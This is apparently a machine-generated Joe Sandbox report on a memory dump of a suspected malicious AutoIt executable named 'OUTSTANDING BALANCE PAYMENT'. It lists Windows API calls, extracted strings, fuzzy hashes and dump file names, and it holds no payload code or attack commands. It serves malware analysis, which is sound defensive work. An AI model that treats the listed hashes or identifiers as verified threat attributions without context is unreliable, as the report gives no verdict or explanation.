                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: 1d75a7cddc2288a37317a03ce7fdd006544cdf4138fa9d9692486d195ed6773a
                                                                  • Instruction ID: 65adccc57c1af20dca24928c20dee40fd4e1d5cbd260afd2c3df6d4537ff3e5b
                                                                  • Opcode Fuzzy Hash: 1d75a7cddc2288a37317a03ce7fdd006544cdf4138fa9d9692486d195ed6773a
                                                                  • Instruction Fuzzy Hash: F702AC75910204EFDB15DFA8CC99EAE7BB9FB48310F00815AF915AB2A1CB70AD41CF60
                                                                  APIs
                                                                  • SetTextColor.GDI32(?,00000000), ref: 002ED2DB
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 002ED30C
                                                                  • GetSysColor.USER32(0000000F), ref: 002ED318
                                                                  • SetBkColor.GDI32(?,000000FF), ref: 002ED332
                                                                  • SelectObject.GDI32(?,00000000), ref: 002ED341
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 002ED36C
                                                                  • GetSysColor.USER32(00000010), ref: 002ED374
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 002ED37B
                                                                  • FrameRect.USER32(?,?,00000000), ref: 002ED38A
                                                                  • DeleteObject.GDI32(00000000), ref: 002ED391
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 002ED3DC
                                                                  • FillRect.USER32(?,?,00000000), ref: 002ED40E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002ED439
                                                                    • Part of subcall function 002ED575: GetSysColor.USER32(00000012), ref: 002ED5AE
                                                                    • Part of subcall function 002ED575: SetTextColor.GDI32(?,?), ref: 002ED5B2
                                                                    • Part of subcall function 002ED575: GetSysColorBrush.USER32(0000000F), ref: 002ED5C8
                                                                    • Part of subcall function 002ED575: GetSysColor.USER32(0000000F), ref: 002ED5D3
                                                                    • Part of subcall function 002ED575: GetSysColor.USER32(00000011), ref: 002ED5F0
                                                                    • Part of subcall function 002ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002ED5FE
                                                                    • Part of subcall function 002ED575: SelectObject.GDI32(?,00000000), ref: 002ED60F
                                                                    • Part of subcall function 002ED575: SetBkColor.GDI32(?,00000000), ref: 002ED618
                                                                    • Part of subcall function 002ED575: SelectObject.GDI32(?,?), ref: 002ED625
                                                                    • Part of subcall function 002ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 002ED644
                                                                    • Part of subcall function 002ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002ED65B
                                                                    • Part of subcall function 002ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 002ED670
                                                                    • Part of subcall function 002ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002ED698
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 3521893082-0
                                                                  • Opcode ID: 5563d28352e3188c2a3164538b6f1a0644907163fd6e7bf65837ff164e6ede3a
                                                                  • Instruction ID: de4acfc890299d68648b91f6ca12e559583cb322987cbda8620dfd29d1c7ca2f
                                                                  • Opcode Fuzzy Hash: 5563d28352e3188c2a3164538b6f1a0644907163fd6e7bf65837ff164e6ede3a
                                                                  • Instruction Fuzzy Hash: E9918D72009301AFCB119FA5DC08A6B7BEDFB89325F500A1AF962961E0C771D944CF52
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CDBD6
                                                                  • GetDriveTypeW.KERNEL32(?,0031DC54,?,\\.\,0031DC00), ref: 002CDCC3
                                                                  • SetErrorMode.KERNEL32(00000000,0031DC54,?,\\.\,0031DC00), ref: 002CDE29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: f3bee74c8bcc16cad7f50d952307dfc0c7e629d05766a2a77f03d872d3de102d
                                                                  • Instruction ID: 07d4d801fa9767898111207a16a46325a9ad230eba5503ebecd87dbf641c4b06
                                                                  • Opcode Fuzzy Hash: f3bee74c8bcc16cad7f50d952307dfc0c7e629d05766a2a77f03d872d3de102d
                                                                  • Instruction Fuzzy Hash: C251A031678302ABC605EF14C8C1E69F7A0FB94705F248A6EF407972D1CBA1DA65DB42
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-86951937
                                                                  • Opcode ID: 110b0da3c9cba8b41ff94803c75475076aaf4f274f491ec171fc3fb5e296e4b9
                                                                  • Instruction ID: 31d9af535b6f3feb40036e20a3e348dbed1e10e74a7175a2aa2987fe3a0abe45
                                                                  • Opcode Fuzzy Hash: 110b0da3c9cba8b41ff94803c75475076aaf4f274f491ec171fc3fb5e296e4b9
                                                                  • Instruction Fuzzy Hash: 46815A3427120AABDB15BE64DC42FFB7769AF16350F244035F905A60C2EB70D975CBA0
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 002EC788
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002EC83E
                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 002EC859
                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 002ECB15
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: 0
                                                                  • API String ID: 2326795674-4108050209
                                                                  • Opcode ID: d41346b1e4a604a78c8794ea60703e6ca43e8b2b3679d26d98e6d8a75c9f6023
                                                                  • Instruction ID: e9140b42dd6615346e8a2f47b61b60b9c6b87aa4d24cb6e968bb0aee43066b74
                                                                  • Opcode Fuzzy Hash: d41346b1e4a604a78c8794ea60703e6ca43e8b2b3679d26d98e6d8a75c9f6023
                                                                  • Instruction Fuzzy Hash: 4EF127701A4382AFD7118FA6CC45BABBBE8FF45314FA4052DF588D62A1C774D862CB91
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,0031DC00), ref: 002E6449
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                  • API String ID: 3964851224-45149045
                                                                  • Opcode ID: c158987b29bfc7b98c789fbecfcd8756c81bcc17cf68cfcc1f901f47f75d9ecc
                                                                  • Instruction ID: 7e976180704e07d36481ee8674600a75dacc0085df81b5ee1f17f72e12c8a54f
                                                                  • Opcode Fuzzy Hash: c158987b29bfc7b98c789fbecfcd8756c81bcc17cf68cfcc1f901f47f75d9ecc
                                                                  • Instruction Fuzzy Hash: C6C1D5342342828BCF05EF11C555AAEB7A5BFA4784F404859F8855B3D2DB70ED6ACF42
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 002ED5AE
                                                                  • SetTextColor.GDI32(?,?), ref: 002ED5B2
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 002ED5C8
                                                                  • GetSysColor.USER32(0000000F), ref: 002ED5D3
                                                                  • CreateSolidBrush.GDI32(?), ref: 002ED5D8
                                                                  • GetSysColor.USER32(00000011), ref: 002ED5F0
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002ED5FE
                                                                  • SelectObject.GDI32(?,00000000), ref: 002ED60F
                                                                  • SetBkColor.GDI32(?,00000000), ref: 002ED618
                                                                  • SelectObject.GDI32(?,?), ref: 002ED625
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 002ED644
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002ED65B
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 002ED670
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002ED698
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002ED6BF
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 002ED6DD
                                                                  • DrawFocusRect.USER32(?,?), ref: 002ED6E8
                                                                  • GetSysColor.USER32(00000011), ref: 002ED6F6
                                                                  • SetTextColor.GDI32(?,00000000), ref: 002ED6FE
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002ED712
                                                                  • SelectObject.GDI32(?,002ED2A5), ref: 002ED729
                                                                  • DeleteObject.GDI32(?), ref: 002ED734
                                                                  • SelectObject.GDI32(?,?), ref: 002ED73A
                                                                  • DeleteObject.GDI32(?), ref: 002ED73F
                                                                  • SetTextColor.GDI32(?,?), ref: 002ED745
                                                                  • SetBkColor.GDI32(?,?), ref: 002ED74F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  • Opcode ID: 83d0ec2a9ef6ce6ad92bd0e266f35ee4487550df8c00d7c3f22edfd8ad0d6d08
                                                                  • Instruction ID: b6093dcb5ea44550a31b61e109917cc4f3eae1f0ae5f30342a36da72e3a51f83
                                                                  • Opcode Fuzzy Hash: 83d0ec2a9ef6ce6ad92bd0e266f35ee4487550df8c00d7c3f22edfd8ad0d6d08
                                                                  • Instruction Fuzzy Hash: 96514D71901208BFDF119FA9DC48EAE7BB9FF08320F104516FA15AB2A1D7719A40CF50
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002EB7B0
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002EB7C1
                                                                  • CharNextW.USER32(0000014E), ref: 002EB7F0
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002EB831
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002EB847
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002EB858
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002EB875
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 002EB8C7
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002EB8DD
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 002EB90E
                                                                  • _memset.LIBCMT ref: 002EB933
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002EB97C
                                                                  • _memset.LIBCMT ref: 002EB9DB
                                                                  • SendMessageW.USER32 ref: 002EBA05
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 002EBA5D
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 002EBB0A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 002EBB2C
                                                                  • GetMenuItemInfoW.USER32(?), ref: 002EBB76
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002EBBA3
                                                                  • DrawMenuBar.USER32(?), ref: 002EBBB2
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 002EBBDA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: 57c8d852b3d9a928a81097b8c8054b2531a1ab766b055a9154e8b22d38099b35
                                                                  • Instruction ID: 97213610c3788f484d8cbaab212cf179a9cb6fb70e9f43062c29e834bf19f46e
                                                                  • Opcode Fuzzy Hash: 57c8d852b3d9a928a81097b8c8054b2531a1ab766b055a9154e8b22d38099b35
                                                                  • Instruction Fuzzy Hash: 89E1C271950259ABDF22CFA2CC84EEF7BB8FF05314F50815AF915AA290DB708961CF60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Foreground
                                                                  • String ID: ACTIVE$ALL$CLASS$H+3$HANDLE$INSTANCE$L+3$LAST$P+3$REGEXPCLASS$REGEXPTITLE$T+3$TITLE
                                                                  • API String ID: 62970417-1565501235
                                                                  • Opcode ID: 3dcecf7838560f3e86df19847896665795f4d0ba495412cdda4f879b98f3dca0
                                                                  • Instruction ID: f260eabeb60278a1ba905d76ab6768a50e44859fea202e2020c266d99d7a343a
                                                                  • Opcode Fuzzy Hash: 3dcecf7838560f3e86df19847896665795f4d0ba495412cdda4f879b98f3dca0
                                                                  • Instruction Fuzzy Hash: F0D1E63012464BDBCB05EF20C4819AAFBA4BF55384F104A2DF556536A2DB70E9BECF91
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 002E778A
                                                                  • GetDesktopWindow.USER32 ref: 002E779F
                                                                  • GetWindowRect.USER32(00000000), ref: 002E77A6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002E7808
                                                                  • DestroyWindow.USER32(?), ref: 002E7834
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002E785D
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002E787B
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002E78A1
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 002E78B6
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002E78C9
                                                                  • IsWindowVisible.USER32(?), ref: 002E78E9
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002E7904
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002E7918
                                                                  • GetWindowRect.USER32(?,?), ref: 002E7930
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 002E7956
                                                                  • GetMonitorInfoW.USER32 ref: 002E7970
                                                                  • CopyRect.USER32(?,?), ref: 002E7987
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 002E79F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: 3aefc5be4a889803706f063fa282e8d1667a3a99aa8336960af659bbc33ffa87
                                                                  • Instruction ID: fc0604bc0ee11e732c8b9aa685586de91bda343533bafff38cfeb736ab0fc81d
                                                                  • Opcode Fuzzy Hash: 3aefc5be4a889803706f063fa282e8d1667a3a99aa8336960af659bbc33ffa87
                                                                  • Instruction Fuzzy Hash: EAB1C171659341AFDB04DF65C848B6ABBE4FF88310F40891DF5999B292D770EC14CB92
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002C6CFB
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002C6D21
                                                                  • _wcscpy.LIBCMT ref: 002C6D4F
                                                                  • _wcscmp.LIBCMT ref: 002C6D5A
                                                                  • _wcscat.LIBCMT ref: 002C6D70
                                                                  • _wcsstr.LIBCMT ref: 002C6D7B
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002C6D97
                                                                  • _wcscat.LIBCMT ref: 002C6DE0
                                                                  • _wcscat.LIBCMT ref: 002C6DE7
                                                                  • _wcsncpy.LIBCMT ref: 002C6E12
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: 85993d76e03752e33733465c07d6cc8a7110b92da2b67287962698915e3f8606
                                                                  • Instruction ID: 639cfd22cc8efd1637c3740c9c5609aca54f4a9015814e5af49707a8b4b5d75a
                                                                  • Opcode Fuzzy Hash: 85993d76e03752e33733465c07d6cc8a7110b92da2b67287962698915e3f8606
                                                                  • Instruction Fuzzy Hash: 2A41EA716102017BEB01AB64CD87EFF77BCDF46720F14416AF901E2182EF759A21DAA5
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0029A939
                                                                  • GetSystemMetrics.USER32(00000007), ref: 0029A941
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0029A96C
                                                                  • GetSystemMetrics.USER32(00000008), ref: 0029A974
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0029A999
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0029A9B6
                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0029A9C6
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0029A9F9
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0029AA0D
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 0029AA2B
                                                                  • GetStockObject.GDI32(00000011), ref: 0029AA47
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0029AA52
                                                                    • Part of subcall function 0029B63C: GetCursorPos.USER32(000000FF), ref: 0029B64F
                                                                    • Part of subcall function 0029B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0029B66C
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000001), ref: 0029B691
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000002), ref: 0029B69F
                                                                  • SetTimer.USER32(00000000,00000000,00000028,0029AB87), ref: 0029AA79
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI
                                                                  • API String ID: 1458621304-248962490
                                                                  • Opcode ID: dbea094af3e883fb46da22d6304a800bb00d6bdcd29df65211afcd0f3525e3c0
                                                                  • Instruction ID: 724311dfa24d53816b61a1f691e6498330dece98506dfdad057d80cb9e0e2c1d
                                                                  • Opcode Fuzzy Hash: dbea094af3e883fb46da22d6304a800bb00d6bdcd29df65211afcd0f3525e3c0
                                                                  • Instruction Fuzzy Hash: 93B1BC75A1120A9FDF05DFA8CC45BAE7BB9FB08314F114229FA05AB290DB74E860CF55
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E3735
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0031DC00,00000000,?,00000000,?,?), ref: 002E37A3
                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002E37EB
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002E3874
                                                                  • RegCloseKey.ADVAPI32(?), ref: 002E3B94
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E3BA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
